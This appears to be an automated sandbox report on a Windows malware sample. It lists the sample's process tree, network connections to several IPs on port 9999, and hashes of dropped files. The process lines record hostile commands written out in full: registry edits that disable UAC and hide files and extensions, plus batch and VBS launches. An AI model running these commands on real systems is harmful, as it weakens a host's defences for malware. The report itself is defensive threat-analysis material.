reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OagAQEsw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ceMoEEYU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iWEMgogo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PScgYokQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LGEEMoQY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\taYggoMc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OyAQcIQE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\COUYwwAM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wOUAosgY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aiUUQYos.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TqgUoccI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JYIMUgMI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xiIEEQAA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| BO | 200.87.164.69:9999 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| BO | 200.87.164.69:9999 | tcp | |
| GB | 172.217.16.238:80 | google.com | tcp |
| GB | 172.217.16.238:80 | google.com | tcp |
| US | 8.8.8.8:53 | 226.108.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| BO | 200.119.204.12:9999 | tcp | |
| BO | 200.119.204.12:9999 | tcp | |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.11.19.2.in-addr.arpa | udp |
| BO | 190.186.45.170:9999 | tcp | |
| BO | 190.186.45.170:9999 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
memory/1988-0-0x0000000000400000-0x0000000000435000-memory.dmp
C:\Users\Admin\nWIcMoMM\teoAYYww.exe
| MD5 | dd1656eeb474abc1dcc6aac4a8431fb5 |
| SHA1 | 8ec7ec7c886890d8b6bf00ec45742d41b577cf49 |
| SHA256 | 924f5094c51268d96d10e27aaa61f5db4bbc3791afa05938136892c43d64905e |
| SHA512 | 49b20d1b0633ba3ab5c53b07747b28a6ca46d18b5d40f130cf6be2da17a592a4b096ae6841b5de1da1da2d0d3b79e4a1fcf8ad57d8b8816cafd6087cdfd6d744 |
C:\ProgramData\UsMEMkgo\KWgYYckw.exe
| MD5 | 91a02b9e7f4412e539d6b2c397292808 |
| SHA1 | 0aa7aa7fd1d3edbe2bec08bd64784dbf915a35e3 |
| SHA256 | 93aec845bf8c02f467792fcc45c0149474339f876e45272447784c57b7421029 |
| SHA512 | db190f256616ec9262f0b17d7675c13dc0e2db06cb6206f25c65ff7f924a84bca2cad3b1a8e458b0935d74d38990288939a72f5b862769fe3e93e29f2ee3228f |
memory/1624-15-0x0000000000400000-0x0000000000431000-memory.dmp
memory/2636-8-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1988-19-0x0000000000400000-0x0000000000435000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vyIoEoIg.bat
| MD5 | bae1095f340720d965898063fede1273 |
| SHA1 | 455d8a81818a7e82b1490c949b32fa7ff98d5210 |
| SHA256 | ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a |
| SHA512 | 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024 |
C:\Users\Admin\AppData\Local\Temp\file.vbs
| MD5 | 4afb5c4527091738faf9cd4addf9d34e |
| SHA1 | 170ba9d866894c1b109b62649b1893eb90350459 |
| SHA256 | 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc |
| SHA512 | 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5 |
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
| MD5 | 598ea3255fb276209072332552903ed8 |
| SHA1 | ccd234d34d488634569a4064a65d643e070e80ed |
| SHA256 | fbe10c0c7d282e3136341735aa4a5716f2c32133828bca64f700c572d7492550 |
| SHA512 | 3b80198ff6bbf9146d1f942d37ab3b1a01edcf634c89e4abeb36c29d7a80afb45f3e30d72ca3246f066c62fa1cac9ea6c3c9627ce5ccd4ca655516c0414632a2 |
memory/1820-32-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2796-43-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4060-55-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4516-67-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2012-78-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3196-89-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3416-102-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4764-113-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1864-124-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4320-135-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1960-145-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4588-149-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1960-160-0x0000000000400000-0x0000000000435000-memory.dmp
memory/632-171-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3712-182-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1596-194-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4908-206-0x0000000000400000-0x0000000000435000-memory.dmp
memory/5000-217-0x0000000000400000-0x0000000000435000-memory.dmp
memory/264-228-0x0000000000400000-0x0000000000435000-memory.dmp
C:\ProgramData\UsMEMkgo\KWgYYckw.inf
| MD5 | 76056ded7b9af86d6ab5d9166f775958 |
| SHA1 | daaa98c0b35bfa7c20dcf59f6fe2051a6377ecb1 |
| SHA256 | dbe5e0f7d8a6cafe5dacb2d22dff70becb9742b8b0f40fe36264e29968afc15d |
| SHA512 | 8ce66101e7cc123e0d2e515947c8f7b1e9335976df8c1926b7e5791fcfb59d549ca8a4d09f87ca2722ba3876feaf5c0d81194352541c5629befd6878b5fd4a65 |
memory/4048-243-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3144-252-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3552-260-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2264-268-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1188-278-0x0000000000400000-0x0000000000435000-memory.dmp
memory/916-286-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1188-287-0x0000000000400000-0x0000000000435000-memory.dmp
memory/916-295-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3692-303-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3328-313-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3756-321-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3464-329-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2704-339-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1756-347-0x0000000000400000-0x0000000000435000-memory.dmp
memory/692-355-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1616-356-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1616-366-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1580-374-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3144-382-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4828-392-0x0000000000400000-0x0000000000435000-memory.dmp
memory/32-393-0x0000000000400000-0x0000000000435000-memory.dmp
memory/32-401-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3116-402-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3116-410-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4456-418-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1200-428-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4672-436-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2936-444-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1168-454-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1200-462-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3600-470-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1484-478-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2324-488-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4144-496-0x0000000000400000-0x0000000000435000-memory.dmp
memory/616-504-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2920-514-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3500-516-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3500-523-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1536-525-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1536-532-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1484-542-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2872-550-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4372-552-0x0000000000400000-0x0000000000432000-memory.dmp
memory/4052-553-0x0000000000400000-0x0000000000432000-memory.dmp
memory/2248-554-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2156-562-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4372-563-0x0000000000400000-0x0000000000432000-memory.dmp
memory/4052-565-0x0000000000400000-0x0000000000432000-memory.dmp
memory/4688-574-0x0000000000400000-0x0000000000435000-memory.dmp
memory/3144-582-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1496-590-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2440-595-0x0000000000400000-0x0000000000435000-memory.dmp
memory/4336-599-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2440-609-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2908-617-0x0000000000400000-0x0000000000435000-memory.dmp
memory/5080-625-0x0000000000400000-0x0000000000435000-memory.dmp
memory/916-635-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2932-644-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1032-643-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2932-652-0x0000000000400000-0x0000000000435000-memory.dmp
memory/5044-653-0x0000000000400000-0x0000000000435000-memory.dmp
memory/5044-661-0x0000000000400000-0x0000000000435000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IoEE.exe
| MD5 | 20eadcd32851654336150ed3fde257be |
| SHA1 | 935c02c9075f5d225e8764e1be3aa50b73ea7ac8 |
| SHA256 | a62d3fb35453e21dd72533a65e6b128ab7f17640e1f0280a4f721d9d25ddf973 |
